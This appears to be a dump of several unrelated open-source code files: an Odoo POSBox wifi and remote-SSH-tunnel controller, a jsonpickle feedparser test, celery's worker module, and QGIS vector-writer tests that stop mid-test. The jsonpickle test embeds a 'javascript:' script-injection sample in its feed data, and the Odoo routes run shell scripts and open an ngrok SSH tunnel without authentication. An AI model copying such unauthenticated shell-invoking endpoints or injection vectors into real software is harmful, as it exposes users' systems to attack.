for line in f:
line = line.rstrip()
line = werkzeug.utils.escape(line)
wifi_template += '<option value="' + line + '">' + line + '</option>\n'
f.close()
except IOError:
_logger.warning("No /tmp/scanned_networks.txt")
wifi_template += """
</select>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" name="password" placeholder="optional"/>
</td>
</tr>
<tr>
<td>
Persistent:
</td>
<td>
<input type="checkbox" name="persistent"/>
</td>
</tr>
<tr>
<td/>
<td>
<input type="submit" value="connect"/>
</td>
</tr>
</table>
</form>
<p>
You can clear the persistent configuration by clicking below:
<form action='/wifi_clear'>
<input type="submit" value="Clear persistent network configuration"/>
</form>
</p>
</body>
</html>
"""
return wifi_template
@http.route('/wifi_connect', type='http', auth='none', cors='*')
def connect_to_wifi(self, essid, password, persistent=False):
if persistent:
persistent = "1"
else:
persistent = ""
subprocess.call(['/home/pi/odoo/addons/point_of_sale/tools/posbox/configuration/connect_to_wifi.sh', essid, password, persistent])
return "connecting to " + essid
@http.route('/wifi_clear', type='http', auth='none', cors='*')
def clear_wifi_configuration(self):
os.system('/home/pi/odoo/addons/point_of_sale/tools/posbox/configuration/clear_wifi_configuration.sh')
return "configuration cleared"
@http.route('/remote_connect', type='http', auth='none', cors='*')
def remote_connect(self):
ngrok_template = """
<!DOCTYPE HTML>
<html>
<head>
<title>Remote debugging</title>
<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
<script>
$(function () {
var upgrading = false;
$('#enable_debug').click(function () {
var auth_token = $('#auth_token').val();
if (auth_token == "") {
alert('Please provide an authentication token.');
} else {
$.ajax({
url: '/enable_ngrok',
data: {
'auth_token': auth_token
}
}).always(function (response) {
if (response === 'already running') {
alert('Remote debugging already activated.');
} else {
$('#auth_token').attr('disabled','disabled');
$('#enable_debug').html('Enabled remote debugging');
$('#enable_debug').removeAttr('href');
$('#enable_debug').off('click');
}
});
}
});
});
</script>
""" + index_style + """
<style>
#enable_debug {
padding: 10px;
background: rgb(121, 197, 107);
color: white;
border-radius: 3px;
text-align: center;
margin: 30px;
text-decoration: none;
display: inline-block;
}
.centering{
text-align: center;
}
</style>
</head>
<body>
<h1>Remote debugging</h1>
<p class='text-red'>
This allows someone to gain remote access to your Posbox, and
thus your entire local network. Only enable this for someone
you trust.
</p>
<div class='centering'>
<input type="text" id="auth_token" size="42" placeholder="Authentication Token"/> <br/>
<a id="enable_debug" href="#">Enable remote debugging</a>
</div>
</body>
</html>
"""
return ngrok_template
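# The page above sends the token to /enable_ngrok below, which starts an
# ngrok TCP tunnel to port 22 (SSH) unless one is already running.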
@http.route('/enable_ngrok', type='http', auth='none', cors='*')
def enable_ngrok(self, auth_token):
if subprocess.call(['pgrep', 'ngrok']) == 1:
subprocess.Popen(['ngrok', 'tcp', '-authtoken', auth_token, '-log', '/tmp/ngrok.log', '22'])
return 'starting with ' + auth_token
else:
return 'already running'
| gpl-3.0 |
FrankBian/kuma | vendor/packages/jsonpickle/tests/thirdparty_tests.py | 5 | 2876 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2008 John Paulett (john -at- paulett.org)
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
import unittest
import jsonpickle
RSS_DOC = """<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:base="http://example.org/" xml:lang="en">
<title type="text">Sample Feed</title>
<subtitle type="html">For documentation <em>only</em></subtitle>
<link rel="alternate" type="html" href="/"/>
<link rel="self" type="application/atom+xml" href="http://www.example.org/atom10.xml"/>
<rights type="html"><p>Copyright 2005, Mark Pilgrim</p></rights>
<generator uri="http://example.org/generator/" version="4.0">Sample Toolkit</generator>
<id>tag:feedparser.org,2005-11-09:/docs/examples/atom10.xml</id>
<updated>2005-11-09T11:56:34Z</updated>
<entry>
<title>First entry title</title>
<link rel="alternate" href="/entry/3"/>
<link rel="related" type="text/html" href="http://search.example.com/"/>
<link rel="via" type="text/html" href="http://toby.example.com/examples/atom10"/>
<link rel="enclosure" type="video/mpeg4" href="http://www.example.com/movie.mp4" length="42301"/>
<id>tag:feedparser.org,2005-11-09:/docs/examples/atom10.xml:3</id>
<published>2005-11-09T00:23:47Z</published>
<updated>2005-11-09T11:56:34Z</updated>
<author>
<name>Mark Pilgrim</name>
<uri>http://diveintomark.org/</uri>
<email>mark@example.org</email>
</author>
<contributor>
<name>Joe</name>
<uri>http://example.org/joe/</uri>
<email>joe@example.org</email>
</contributor>
<contributor>
<name>Sam</name>
<uri>http://example.org/sam/</uri>
<email>sam@example.org</email>
</contributor>
<summary type="text">Watch out for nasty tricks</summary>
<content type="xhtml" xml:base="http://example.org/entry/3" xml:lang="en-US">
<div xmlns="http://www.w3.org/1999/xhtml">Watch out for <span style="background: url(javascript:window.location='http://example.org/')"> nasty tricks</span></div>
</content>
</entry>
</feed>"""
class FeedParserTest(unittest.TestCase):
def setUp(self):
try:
import feedparser
except ImportError, e:
self.fail("feedparser module not available, please install")
self.doc = feedparser.parse(RSS_DOC)
def test(self):
pickled = jsonpickle.encode(self.doc)
unpickled = jsonpickle.decode(pickled)
self.assertEquals(self.doc['feed']['title'], unpickled['feed']['title'])
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(FeedParserTest, 'test'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| mpl-2.0 |
campbe13/openhatch | vendor/packages/celery/celery/worker/__init__.py | 18 | 12962 | # -*- coding: utf-8 -*-
"""
celery.worker
~~~~~~~~~~~~~
The worker.
:copyright: (c) 2009 - 2011 by Ask Solem.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import atexit
import logging
import socket
import sys
import threading
import traceback
from kombu.utils.finalize import Finalize
from .. import beat
from .. import concurrency as _concurrency
from .. import registry, platforms, signals
from ..app import app_or_default
from ..exceptions import SystemTerminate
from ..log import SilenceRepeated
from ..utils import noop, instantiate
from . import state
from .buckets import TaskBucket, FastQueue
RUN = 0x1
CLOSE = 0x2
TERMINATE = 0x3
#: List of signals to reset when a child process starts.
WORKER_SIGRESET = frozenset(["SIGTERM",
"SIGHUP",
"SIGTTIN",
"SIGTTOU",
"SIGUSR1"])
#: List of signals to ignore when a child process starts.
WORKER_SIGIGNORE = frozenset(["SIGINT"])
def process_initializer(app, hostname):
"""Initializes the process so it can be used to process tasks.
Used for multiprocessing environments.
"""
app = app_or_default(app)
app.set_current()
platforms.signals.reset(*WORKER_SIGRESET)
platforms.signals.ignore(*WORKER_SIGIGNORE)
platforms.set_mp_process_title("celeryd", hostname=hostname)
# This is for Windows and other platforms not supporting
# fork(). Note that init_worker makes sure it's only
# run once per process.
app.loader.init_worker()
app.loader.init_worker_process()
signals.worker_process_init.send(sender=None)
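# Note: this initializer is wired into the worker pool further down in
# WorkController.__init__ via initializer=process_initializer and
# initargs=(self.app, self.hostname), so each child process runs it once
# before it starts consuming tasks.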
class WorkController(object):
"""Unmanaged worker instance."""
RUN = RUN
CLOSE = CLOSE
TERMINATE = TERMINATE
#: The number of simultaneous processes doing work (default:
#: :setting:`CELERYD_CONCURRENCY`)
concurrency = None
#: The loglevel used (default: :const:`logging.INFO`)
loglevel = logging.ERROR
#: The logfile used, if no logfile is specified it uses `stderr`
#: (default: :setting:`CELERYD_LOG_FILE`).
logfile = None
#: If :const:`True`, celerybeat is embedded, running in the main worker
#: process as a thread.
embed_clockservice = None
#: Enable the sending of monitoring events, these events can be captured
#: by monitors (celerymon).
send_events = False
#: The :class:`logging.Logger` instance used for logging.
logger = None
#: The pool instance used.
pool = None
#: The internal queue object that holds tasks ready for immediate
#: processing.
ready_queue = None
#: Instance of :class:`celery.worker.mediator.Mediator`.
mediator = None
#: Consumer instance.
consumer = None
_state = None
_running = 0
def __init__(self, concurrency=None, logfile=None, loglevel=None,
send_events=None, hostname=None, ready_callback=noop,
embed_clockservice=False, pool_cls=None, consumer_cls=None,
mediator_cls=None, eta_scheduler_cls=None,
schedule_filename=None, task_time_limit=None,
task_soft_time_limit=None, max_tasks_per_child=None,
pool_putlocks=None, db=None, prefetch_multiplier=None,
eta_scheduler_precision=None, disable_rate_limits=None,
autoscale=None, autoscaler_cls=None, scheduler_cls=None,
app=None):
self.app = app_or_default(app)
conf = self.app.conf
self._shutdown_complete = threading.Event()
# Options
self.loglevel = loglevel or self.loglevel
self.concurrency = concurrency or conf.CELERYD_CONCURRENCY
self.logfile = logfile or conf.CELERYD_LOG_FILE
self.logger = self.app.log.get_default_logger()
if send_events is None:
send_events = conf.CELERY_SEND_EVENTS
self.send_events = send_events
self.pool_cls = _concurrency.get_implementation(
pool_cls or conf.CELERYD_POOL)
self.consumer_cls = consumer_cls or conf.CELERYD_CONSUMER
self.mediator_cls = mediator_cls or conf.CELERYD_MEDIATOR
self.eta_scheduler_cls = eta_scheduler_cls or \
conf.CELERYD_ETA_SCHEDULER
self.autoscaler_cls = autoscaler_cls or \
conf.CELERYD_AUTOSCALER
self.schedule_filename = schedule_filename or \
conf.CELERYBEAT_SCHEDULE_FILENAME
self.scheduler_cls = scheduler_cls or conf.CELERYBEAT_SCHEDULER
self.hostname = hostname or socket.gethostname()
self.embed_clockservice = embed_clockservice
self.ready_callback = ready_callback
self.task_time_limit = task_time_limit or \
conf.CELERYD_TASK_TIME_LIMIT
self.task_soft_time_limit = task_soft_time_limit or \
conf.CELERYD_TASK_SOFT_TIME_LIMIT
self.max_tasks_per_child = max_tasks_per_child or \
conf.CELERYD_MAX_TASKS_PER_CHILD
self.pool_putlocks = pool_putlocks or \
conf.CELERYD_POOL_PUTLOCKS
self.eta_scheduler_precision = eta_scheduler_precision or \
conf.CELERYD_ETA_SCHEDULER_PRECISION
self.prefetch_multiplier = prefetch_multiplier or \
conf.CELERYD_PREFETCH_MULTIPLIER
self.timer_debug = SilenceRepeated(self.logger.debug,
max_iterations=10)
self.db = db or conf.CELERYD_STATE_DB
self.disable_rate_limits = disable_rate_limits or \
conf.CELERY_DISABLE_RATE_LIMITS
self._finalize = Finalize(self, self.stop, exitpriority=1)
self._finalize_db = None
if self.db:
self._persistence = state.Persistent(self.db)
atexit.register(self._persistence.save)
# Queues
if not self.pool_cls.rlimit_safe:
self.disable_rate_limits = True
if self.disable_rate_limits:
self.ready_queue = FastQueue()
self.ready_queue.put = self.process_task
else:
self.ready_queue = TaskBucket(task_registry=registry.tasks)
self.logger.debug("Instantiating thread components...")
# Threads + Pool + Consumer
self.autoscaler = None
max_concurrency = None
min_concurrency = concurrency
if autoscale:
max_concurrency, min_concurrency = autoscale
self.pool = instantiate(self.pool_cls, min_concurrency,
logger=self.logger,
initializer=process_initializer,
initargs=(self.app, self.hostname),
maxtasksperchild=self.max_tasks_per_child,
timeout=self.task_time_limit,
soft_timeout=self.task_soft_time_limit,
putlocks=self.pool_putlocks)
self.priority_timer = instantiate(self.pool.Timer)
if not self.eta_scheduler_cls:
# Default Timer is set by the pool, as e.g. eventlet
# needs a custom implementation.
self.eta_scheduler_cls = self.pool.Timer
self.autoscaler = None
if autoscale:
self.autoscaler = instantiate(self.autoscaler_cls, self.pool,
max_concurrency=max_concurrency,
min_concurrency=min_concurrency,
logger=self.logger)
self.mediator = None
if not self.disable_rate_limits:
self.mediator = instantiate(self.mediator_cls, self.ready_queue,
app=self.app,
callback=self.process_task,
logger=self.logger)
self.scheduler = instantiate(self.eta_scheduler_cls,
precision=eta_scheduler_precision,
on_error=self.on_timer_error,
on_tick=self.on_timer_tick)
self.beat = None
if self.embed_clockservice:
self.beat = beat.EmbeddedService(app=self.app,
logger=self.logger,
schedule_filename=self.schedule_filename,
scheduler_cls=self.scheduler_cls)
prefetch_count = self.concurrency * self.prefetch_multiplier
self.consumer = instantiate(self.consumer_cls,
self.ready_queue,
self.scheduler,
logger=self.logger,
hostname=self.hostname,
send_events=self.send_events,
init_callback=self.ready_callback,
initial_prefetch_count=prefetch_count,
pool=self.pool,
priority_timer=self.priority_timer,
app=self.app,
controller=self)
# The order is important here;
# the first in the list is the first to start,
# and they must be stopped in reverse order.
self.components = filter(None, (self.pool,
self.mediator,
self.scheduler,
self.beat,
self.autoscaler,
self.consumer))
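# start() below walks this list front to back, while _shutdown() walks
# reversed(self.components), which is what the ordering note above relies on.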
def start(self):
"""Starts the workers main loop."""
self._state = self.RUN
try:
for i, component in enumerate(self.components):
self.logger.debug("Starting thread %s...",
component.__class__.__name__)
self._running = i + 1
component.start()
except SystemTerminate:
self.terminate()
except Exception, exc:
self.logger.error("Unrecoverable error: %r" % (exc, ),
exc_info=sys.exc_info())
self.stop()
except (KeyboardInterrupt, SystemExit):
self.stop()
# Will only get here if running green,
# makes sure all greenthreads have exited.
self._shutdown_complete.wait()
def process_task(self, request):
"""Process task by sending it to the pool of workers."""
try:
request.task.execute(request, self.pool,
self.loglevel, self.logfile)
except Exception, exc:
self.logger.critical("Internal error %s: %s\n%s",
exc.__class__, exc, traceback.format_exc(),
exc_info=True)
except SystemTerminate:
self.terminate()
raise
except BaseException, exc:
self.stop()
raise exc
def stop(self, in_sighandler=False):
"""Graceful shutdown of the worker server."""
if not in_sighandler or self.pool.signal_safe:
self._shutdown(warm=True)
def terminate(self, in_sighandler=False):
"""Not so graceful shutdown of the worker server."""
if not in_sighandler or self.pool.signal_safe:
self._shutdown(warm=False)
def _shutdown(self, warm=True):
what = (warm and "stopping" or "terminating").capitalize()
if self._state in (self.CLOSE, self.TERMINATE):
return
if self._state != self.RUN or self._running != len(self.components):
# Not fully started, can safely exit.
self._state = self.TERMINATE
self._shutdown_complete.set()
return
self._state = self.CLOSE
signals.worker_shutdown.send(sender=self)
for component in reversed(self.components):
self.logger.debug("%s thread %s...", what,
component.__class__.__name__)
stop = component.stop
if not warm:
stop = getattr(component, "terminate", None) or stop
stop()
self.priority_timer.stop()
self.consumer.close_connection()
self._state = self.TERMINATE
self._shutdown_complete.set()
def on_timer_error(self, exc_info):
_, exc, _ = exc_info
self.logger.error("Timer error: %r", exc, exc_info=exc_info)
def on_timer_tick(self, delay):
self.timer_debug("Scheduler wake-up! Next eta %s secs." % delay)
| agpl-3.0 |
t-hey/QGIS-Original | tests/src/python/test_qgsvectorfilewriter.py | 2 | 35947 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsVectorFileWriter.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
from builtins import next
from builtins import str
__author__ = 'Tim Sutton'
__date__ = '20/08/2012'
__copyright__ = 'Copyright 2012, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis # NOQA
from qgis.core import (QgsVectorLayer,
QgsFeature,
QgsField,
QgsGeometry,
QgsPointXY,
QgsCoordinateReferenceSystem,
QgsVectorFileWriter,
QgsFeatureRequest,
QgsWkbTypes,
QgsRectangle,
QgsCoordinateTransform
)
from qgis.PyQt.QtCore import QDate, QTime, QDateTime, QVariant, QDir
import os
import osgeo.gdal # NOQA
from osgeo import gdal, ogr
from qgis.testing import start_app, unittest
from utilities import writeShape, compareWkt, unitTestDataPath
TEST_DATA_DIR = unitTestDataPath()
start_app()
def GDAL_COMPUTE_VERSION(maj, min, rev):
return ((maj) * 1000000 + (min) * 10000 + (rev) * 100)
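# e.g. GDAL_COMPUTE_VERSION(2, 2, 0) == 2020000, mirroring GDAL's own
# GDAL_COMPUTE_VERSION(maj, min, rev) macro encoding.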
class TestFieldValueConverter(QgsVectorFileWriter.FieldValueConverter):
def __init__(self, layer):
QgsVectorFileWriter.FieldValueConverter.__init__(self)
self.layer = layer
def fieldDefinition(self, field):
idx = self.layer.fields().indexFromName(field.name())
if idx == 0:
return self.layer.fields()[idx]
elif idx == 2:
return QgsField('conv_attr', QVariant.String)
return QgsField('unexpected_idx')
def convert(self, idx, value):
if idx == 0:
return value
elif idx == 2:
if value == 3:
return 'converted_val'
else:
return 'unexpected_val!'
return 'unexpected_idx'
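# This converter is exercised by testValueConverter() below, which passes it to
# QgsVectorFileWriter.writeAsVectorFormat() through the fieldValueConverter
# argument: field 0 is written unchanged, field 2 is renamed to 'conv_attr' and
# its value 3 becomes 'converted_val', while field 1 is skipped via attributes=[0, 2].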
class TestQgsVectorFileWriter(unittest.TestCase):
mMemoryLayer = None
def testWrite(self):
"""Check we can write a vector file."""
self.mMemoryLayer = QgsVectorLayer(
('Point?crs=epsg:4326&field=name:string(20)&'
'field=age:integer&field=size:double&index=yes'),
'test',
'memory')
self.assertIsNotNone(self.mMemoryLayer, 'Provider not initialized')
myProvider = self.mMemoryLayer.dataProvider()
self.assertIsNotNone(myProvider)
ft = QgsFeature()
ft.setGeometry(QgsGeometry.fromPointXY(QgsPointXY(10, 10)))
ft.setAttributes(['Johny', 20, 0.3])
myResult, myFeatures = myProvider.addFeatures([ft])
self.assertTrue(myResult)
self.assertTrue(myFeatures)
writeShape(self.mMemoryLayer, 'writetest.shp')
def testWriteWithBoolField(self):
# init connection string
dbconn = 'dbname=\'qgis_test\''
if 'QGIS_PGTEST_DB' in os.environ:
dbconn = os.environ['QGIS_PGTEST_DB']
# create a vector layer
vl = QgsVectorLayer('{} table="qgis_test"."boolean_table" sql='.format(dbconn), "testbool", "postgres")
self.assertTrue(vl.isValid())
# check that 1 of its fields is a bool
fields = vl.fields()
self.assertEqual(fields.at(fields.indexFromName('fld1')).type(), QVariant.Bool)
# write a gpkg package with a bool field
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
filename = os.path.join(str(QDir.tempPath()), 'with_bool_field')
rc, errmsg = QgsVectorFileWriter.writeAsVectorFormat(vl,
filename,
'utf-8',
crs,
'GPKG')
self.assertEqual(rc, QgsVectorFileWriter.NoError)
# open the resulting geopackage
vl = QgsVectorLayer(filename + '.gpkg', '', 'ogr')
self.assertTrue(vl.isValid())
fields = vl.fields()
# test type of converted field
idx = fields.indexFromName('fld1')
self.assertEqual(fields.at(idx).type(), QVariant.Bool)
# test values
self.assertEqual(vl.getFeature(1).attributes()[idx], 1)
self.assertEqual(vl.getFeature(2).attributes()[idx], 0)
def testDateTimeWriteShapefile(self):
"""Check writing date and time fields to an ESRI shapefile."""
ml = QgsVectorLayer(
('Point?crs=epsg:4326&field=id:int&'
'field=date_f:date&field=time_f:time&field=dt_f:datetime'),
'test',
'memory')
self.assertTrue(ml.isValid())
provider = ml.dataProvider()
self.assertIsNotNone(provider)
ft = QgsFeature()
ft.setGeometry(QgsGeometry.fromPointXY(QgsPointXY(10, 10)))
ft.setAttributes([1, QDate(2014, 3, 5), QTime(13, 45, 22), QDateTime(QDate(2014, 3, 5), QTime(13, 45, 22))])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
dest_file_name = os.path.join(str(QDir.tempPath()), 'datetime.shp')
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile')
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
fields = created_layer.dataProvider().fields()
self.assertEqual(fields.at(fields.indexFromName('date_f')).type(), QVariant.Date)
# shapefiles do not support time types, result should be string
self.assertEqual(fields.at(fields.indexFromName('time_f')).type(), QVariant.String)
# shapefiles do not support datetime types, result should be string
self.assertEqual(fields.at(fields.indexFromName('dt_f')).type(), QVariant.String)
f = next(created_layer.getFeatures(QgsFeatureRequest()))
date_idx = created_layer.fields().lookupField('date_f')
self.assertIsInstance(f.attributes()[date_idx], QDate)
self.assertEqual(f.attributes()[date_idx], QDate(2014, 3, 5))
time_idx = created_layer.fields().lookupField('time_f')
# shapefiles do not support time types
self.assertIsInstance(f.attributes()[time_idx], str)
self.assertEqual(f.attributes()[time_idx], '13:45:22')
# shapefiles do not support datetime types
datetime_idx = created_layer.fields().lookupField('dt_f')
self.assertIsInstance(f.attributes()[datetime_idx], str)
self.assertEqual(f.attributes()[datetime_idx],
QDateTime(QDate(2014, 3, 5), QTime(13, 45, 22)).toString("yyyy/MM/dd hh:mm:ss.zzz"))
def testWriterWithExtent(self):
"""Check writing using extent filter."""
source_file = os.path.join(TEST_DATA_DIR, 'points.shp')
source_layer = QgsVectorLayer(source_file, 'Points', 'ogr')
self.assertTrue(source_layer.isValid())
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'ESRI Shapefile'
options.filterExtent = QgsRectangle(-111, 26, -96, 38)
dest_file_name = os.path.join(str(QDir.tempPath()), 'extent_no_transform.shp')
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
source_layer,
dest_file_name,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
features = [f for f in created_layer.getFeatures()]
self.assertEqual(len(features), 5)
for f in features:
self.assertTrue(f.geometry().intersects(options.filterExtent))
def testWriterWithExtentAndReprojection(self):
"""Check writing using extent filter with reprojection."""
source_file = os.path.join(TEST_DATA_DIR, 'points.shp')
source_layer = QgsVectorLayer(source_file, 'Points', 'ogr')
self.assertTrue(source_layer.isValid())
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'ESRI Shapefile'
options.filterExtent = QgsRectangle(-12511460, 3045157, -10646621, 4683497)
options.ct = QgsCoordinateTransform(source_layer.crs(), QgsCoordinateReferenceSystem.fromEpsgId(3785))
dest_file_name = os.path.join(str(QDir.tempPath()), 'extent_transform.shp')
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
source_layer,
dest_file_name,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
features = [f for f in created_layer.getFeatures()]
self.assertEqual(len(features), 5)
for f in features:
self.assertTrue(f.geometry().intersects(options.filterExtent))
def testDateTimeWriteTabfile(self):
"""Check writing date and time fields to an MapInfo tabfile."""
ml = QgsVectorLayer(
('Point?crs=epsg:4326&field=id:int&'
'field=date_f:date&field=time_f:time&field=dt_f:datetime'),
'test',
'memory')
self.assertIsNotNone(ml, 'Provider not initialized')
self.assertTrue(ml.isValid(), 'Source layer not valid')
provider = ml.dataProvider()
self.assertIsNotNone(provider)
ft = QgsFeature()
ft.setGeometry(QgsGeometry.fromPointXY(QgsPointXY(10, 10)))
ft.setAttributes([1, QDate(2014, 3, 5), QTime(13, 45, 22), QDateTime(QDate(2014, 3, 5), QTime(13, 45, 22))])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
dest_file_name = os.path.join(str(QDir.tempPath()), 'datetime.tab')
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'MapInfo File')
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
fields = created_layer.dataProvider().fields()
self.assertEqual(fields.at(fields.indexFromName('date_f')).type(), QVariant.Date)
self.assertEqual(fields.at(fields.indexFromName('time_f')).type(), QVariant.Time)
self.assertEqual(fields.at(fields.indexFromName('dt_f')).type(), QVariant.DateTime)
f = next(created_layer.getFeatures(QgsFeatureRequest()))
date_idx = created_layer.fields().lookupField('date_f')
self.assertIsInstance(f.attributes()[date_idx], QDate)
self.assertEqual(f.attributes()[date_idx], QDate(2014, 3, 5))
time_idx = created_layer.fields().lookupField('time_f')
self.assertIsInstance(f.attributes()[time_idx], QTime)
self.assertEqual(f.attributes()[time_idx], QTime(13, 45, 22))
datetime_idx = created_layer.fields().lookupField('dt_f')
self.assertIsInstance(f.attributes()[datetime_idx], QDateTime)
self.assertEqual(f.attributes()[datetime_idx], QDateTime(QDate(2014, 3, 5), QTime(13, 45, 22)))
def testWriteShapefileWithZ(self):
"""Check writing geometries with Z dimension to an ESRI shapefile."""
# start by saving a memory layer and forcing z
ml = QgsVectorLayer(
('Point?crs=epsg:4326&field=id:int'),
'test',
'memory')
self.assertIsNotNone(ml, 'Provider not initialized')
self.assertTrue(ml.isValid(), 'Source layer not valid')
provider = ml.dataProvider()
self.assertIsNotNone(provider)
ft = QgsFeature()
ft.setGeometry(QgsGeometry.fromWkt('PointZ (1 2 3)'))
ft.setAttributes([1])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
# check with both a standard PointZ and 25d style Point25D type
for t in [QgsWkbTypes.PointZ, QgsWkbTypes.Point25D]:
dest_file_name = os.path.join(str(QDir.tempPath()), 'point_{}.shp'.format(QgsWkbTypes.displayString(t)))
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile',
overrideGeometryType=t)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
f = next(created_layer.getFeatures(QgsFeatureRequest()))
g = f.geometry()
wkt = g.asWkt()
expWkt = 'PointZ (1 2 3)'
self.assertTrue(compareWkt(expWkt, wkt),
"saving geometry with Z failed: mismatch Expected:\n%s\nGot:\n%s\n" % (expWkt, wkt))
# also try saving out the shapefile version again, as an extra test
# this tests that saving a layer with z WITHOUT explicitly telling the writer to keep z values,
# will still retain the z values
dest_file_name = os.path.join(str(QDir.tempPath()),
'point_{}_copy.shp'.format(QgsWkbTypes.displayString(t)))
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
created_layer,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile')
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer_from_shp = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
f = next(created_layer_from_shp.getFeatures(QgsFeatureRequest()))
g = f.geometry()
wkt = g.asWkt()
self.assertTrue(compareWkt(expWkt, wkt),
"saving geometry with Z failed: mismatch Expected:\n%s\nGot:\n%s\n" % (expWkt, wkt))
def testWriteShapefileWithMultiConversion(self):
"""Check writing geometries to an ESRI shapefile with conversion to multi."""
ml = QgsVectorLayer(
('Point?crs=epsg:4326&field=id:int'),
'test',
'memory')
self.assertIsNotNone(ml, 'Provider not initialized')
self.assertTrue(ml.isValid(), 'Source layer not valid')
provider = ml.dataProvider()
self.assertIsNotNone(provider)
ft = QgsFeature()
ft.setGeometry(QgsGeometry.fromWkt('Point (1 2)'))
ft.setAttributes([1])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
dest_file_name = os.path.join(str(QDir.tempPath()), 'to_multi.shp')
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile',
forceMulti=True)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
f = next(created_layer.getFeatures(QgsFeatureRequest()))
g = f.geometry()
wkt = g.asWkt()
expWkt = 'MultiPoint ((1 2))'
self.assertTrue(compareWkt(expWkt, wkt),
"saving geometry with multi conversion failed: mismatch Expected:\n%s\nGot:\n%s\n" % (
expWkt, wkt))
def testWriteShapefileWithAttributeSubsets(self):
"""Tests writing subsets of attributes to files."""
ml = QgsVectorLayer(
('Point?crs=epsg:4326&field=id:int&field=field1:int&field=field2:int&field=field3:int'),
'test',
'memory')
self.assertIsNotNone(ml, 'Provider not initialized')
self.assertTrue(ml.isValid(), 'Source layer not valid')
provider = ml.dataProvider()
self.assertIsNotNone(provider)
ft = QgsFeature()
ft.setGeometry(QgsGeometry.fromWkt('Point (1 2)'))
ft.setAttributes([1, 11, 12, 13])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
# first write out with all attributes
dest_file_name = os.path.join(str(QDir.tempPath()), 'all_attributes.shp')
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile',
attributes=[])
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
self.assertEqual(created_layer.fields().count(), 4)
f = next(created_layer.getFeatures(QgsFeatureRequest()))
self.assertEqual(f['id'], 1)
self.assertEqual(f['field1'], 11)
self.assertEqual(f['field2'], 12)
self.assertEqual(f['field3'], 13)
# now test writing out only a subset of attributes
dest_file_name = os.path.join(str(QDir.tempPath()), 'subset_attributes.shp')
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile',
attributes=[1, 3])
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
self.assertEqual(created_layer.fields().count(), 2)
